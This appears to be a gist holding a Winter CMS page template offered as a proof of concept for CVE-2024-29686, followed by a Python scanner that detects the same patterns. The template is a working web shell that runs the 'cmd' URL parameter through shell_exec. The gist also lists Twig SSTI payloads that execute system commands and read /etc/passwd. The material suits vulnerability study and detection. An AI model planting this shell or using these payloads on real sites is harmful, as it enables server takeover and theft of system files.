@RajChowdhury240
Created February 6, 2026 22:47
title = "Demonstration"
url = "/"
layout = "default"
==
function onStart()
{
    // SSTI Proof of Concept - Command Execution
    $this['var'] = 'Winter CMS';

    // RCE: Execute system command through PHP code section
    $cmd = input('cmd', 'id');
    $this['rce_result'] = shell_exec($cmd);

    // Alternative: Direct PHP code execution demonstration
    $this['php_version'] = phpversion();
    $this['system_info'] = php_uname();
}
==
<h1 class="display-1">SSTI/RCE Proof of Concept</h1>
<div class="alert alert-danger">
<h4>⚠️ Vulnerability Demonstration</h4>
<p>This page demonstrates <strong>CVE-2024-29686</strong> - Server-Side Template Injection (SSTI) in Winter CMS v1.2.3</p>
</div>
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Remote Code Execution via Template Code Section</h3>
</div>
<div class="panel-body">
<p><strong>Variable Value:</strong> {{ var }}</p>
<p><strong>PHP Version:</strong> {{ php_version }}</p>
<p><strong>System Info:</strong> {{ system_info }}</p>
<hr>
<h4>Command Execution Result:</h4>
<pre style="background:#f5f5f5;padding:10px;border:1px solid #ddd;">{{ rce_result|default('No command executed. Try adding ?cmd=whoami to the URL') }}</pre>
<p class="text-muted">
<small>Try accessing: <code>?cmd=whoami</code> or <code>?cmd=ls -la</code></small>
</p>
</div>
</div>
<div class="panel panel-warning">
<div class="panel-heading">
<h3 class="panel-title">Twig SSTI Payload Examples</h3>
</div>
<div class="panel-body">
<p>If Twig markup was stored from user input, these payloads would execute:</p>
<ul>
<li><code>{% verbatim %}{{ ['id']|filter('system') }}{% endverbatim %}</code> - Execute system commands via Twig filters</li>
<li><code>{% verbatim %}{{ _self.env.getFilter('system').callback(['whoami']) }}{% endverbatim %}</code> - Access Twig internals</li>
<li><code>{% verbatim %}{{ ['cat /etc/passwd']|map('shell_exec')|join }}{% endverbatim %}</code> - Read system files</li>
</ul>
</div>
</div>
<div class="alert alert-info">
<h4>Technical Details</h4>
<ul>
<li><strong>CVE ID:</strong> CVE-2024-29686</li>
<li><strong>Affected Versions:</strong> Winter CMS ≤ v1.2.3</li>
<li><strong>Severity:</strong> HIGH (CVSS: 8.8)</li>
<li><strong>Attack Vector:</strong> Authenticated admin access to CMS templates</li>
</ul>
</div>
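
An added detection example, not part of the gist and not Winter CMS code: a Python scanner that splits a template file on its `==` separators and flags command-execution calls in the PHP code section and the Twig callable-filter and `_self.env` patterns listed above, ignoring text inside `verbatim` blocks. The function list, the name `scan_template` and the sample template are assumptions constructed for illustration.

```python
import re

# Command/code execution functions to flag (illustrative, not exhaustive).
EXEC = r"(?:shell_exec|system|exec|passthru|popen|proc_open|eval)"
# Bare calls only: skips method calls ($x->exec) and longer names (my_exec).
PHP_CALL = re.compile(r"(?<![\w>$])" + EXEC + r"\s*\(")
# Twig filters that take a callable, handed one of the names above as a string.
TWIG_CALLABLE = re.compile(r"\|\s*(?:filter|map|reduce|sort)\s*\(\s*['\"]" + EXEC + r"['\"]")
TWIG_ENV = re.compile(r"_self\s*\.\s*env\b")
VERBATIM = re.compile(r"\{%-?\s*verbatim\s*-?%\}.*?\{%-?\s*endverbatim\s*-?%\}", re.S)

def scan_template(text):
    """Return (line_number, section, reason) findings for one template file."""
    lines = text.splitlines()
    seps = [i for i, l in enumerate(lines) if l.strip() == "=="][:2]
    findings = []
    # Two separators: settings, PHP code, markup. Fewer: no PHP section.
    if len(seps) == 2:
        for i in range(seps[0] + 1, seps[1]):
            m = PHP_CALL.search(lines[i])
            if m:
                findings.append((i + 1, "php", "calls " + m.group(0).rstrip("( \t")))
    start = seps[-1] + 1 if seps else 0
    # Twig prints verbatim blocks without evaluating them: blank them, keep line count.
    twig = VERBATIM.sub(lambda m: "\n" * m.group(0).count("\n"), "\n".join(lines[start:]))
    for off, line in enumerate(twig.split("\n")):
        if TWIG_CALLABLE.search(line):
            findings.append((start + off + 1, "twig", "exec function passed as callable"))
        if TWIG_ENV.search(line):
            findings.append((start + off + 1, "twig", "access to _self.env"))
    return findings

# Constructed sample, modelled on the template above.
SAMPLE = """title = "Demo"
url = "/"
==
function onStart()
{
    // comment mentioning the system command
    $this['out'] = shell_exec(input('cmd'));
    $this['ok'] = $this->exec('x');
}
==
<p>{{ out }}</p>
<code>{% verbatim %}{{ ['id']|filter('system') }}{% endverbatim %}</code>
<p>{{ names|map('shell_exec')|join }}</p>
<p>{{ _self.env.getFilter('x') }}</p>
"""
print(scan_template(SAMPLE))
```

Run over a theme's template files, this gives a quick review list after any change made through the backend template editor; a hit in the PHP section is only a lead, since legitimate themes may call these functions too.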